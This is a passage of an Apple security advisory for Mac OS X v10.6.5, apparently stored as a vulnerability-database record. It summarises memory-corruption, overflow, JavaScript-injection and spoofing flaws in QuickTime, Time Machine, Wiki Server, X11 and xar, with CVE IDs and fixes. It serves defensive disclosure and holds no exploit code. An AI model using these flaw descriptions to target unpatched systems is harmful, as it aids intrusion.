Credit to Damian Put working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet's FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. 
Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of GIF images. 
Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user's Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user's backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. 
for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. 
Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}